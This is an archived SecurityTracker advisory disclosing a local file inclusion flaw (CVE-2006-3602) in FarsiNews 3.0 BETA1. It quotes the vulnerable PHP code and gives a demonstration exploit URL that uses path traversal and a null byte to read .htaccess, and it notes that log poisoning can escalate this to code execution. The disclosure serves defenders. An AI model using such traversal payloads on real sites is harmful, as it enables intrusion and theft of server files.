SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com





Category:   Application (Forum/Board/Portal)  >   FarsiNews Vendors:   farsinewsteam.com
FarsiNews Include File Bug Lets Users Execute Arbitrary Code
SecurityTracker Alert ID:  1016464
SecurityTracker URL:  http://securitytracker.com/id/1016464
CVE Reference:   CVE-2006-3602   (Links to External Site)
Updated:  Jul 18 2008
Original Entry Date:  Jul 11 2006
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 3.0 BETA1
Description:   A vulnerability was reported in FarsiNews. A remote user can include and execute arbitrary code from local files on the target system.

The software does not properly validate user-supplied input. If magic_quotes_gpc is disabled, a remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a file on the target system. The PHP code, including operating system commands, will run with the privileges of the target web service.

If the remote user can cause PHP code to be written to a file on the system (such as to a web server log file), then the remote user can cause arbitrary code to be executed by including the file.

A demonstration exploit URL is provided:

http://[target]/jscripts/tiny_mce/tiny_mce_gzip.php?language=../../../../.htaccess%00&theme=advanced

armin390 reported this vulnerability.
Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.farsinewsteam.com/ (Links to External Site)
Cause:   Input validation error, State error
Underlying OS:   Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.

 Source Message Contents
Date:  10 Jul 2006 15:33:33 -0000
Subject:  Local file inclusion in Farsinews3.0BETA1

if magic_quotes_gpc is Off in php.ini then local file inclusion in /jscripts/tiny_mce/tiny_mce_gzip.php is available to use;)!!
why?
#code(jscripts/tiny_mce/tiny_mce_gzip.php)
...
	$theme = isset($_REQUEST['theme']) ? $_REQUEST['theme'] : "";
	$language = isset($_REQUEST['language']) ? $_REQUEST['language'] : "";
	$plugins = isset($_REQUEST['plugins']) ? $_REQUEST['plugins'] : "";
...
	if ($theme) {
		// Write main script and patch some things
		echo file_get_contents(realpath("tiny_mce" . $suffix . ".js"));
		echo 'TinyMCE.prototype.loadScript = function() {};';
		echo "tinyMCE.init(TinyMCECompressed_settings);";

		// Load theme, language pack and theme language packs
		echo file_get_contents(realpath("themes/" . $theme . "/editor_template" . $suffix . ".js"));
		echo file_get_contents(realpath("themes/" . $theme . "/langs/" . $language . ".js"));
		echo file_get_contents(realpath("langs/" . $language . ".js"));

#exploit
for example!:
http://target/jscripts/tiny_mce/tiny_mce_gzip.php?language=../../../../.htaccess%00&theme=advanced
...


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us

Copyright 2012, SecurityGlobal.net LLC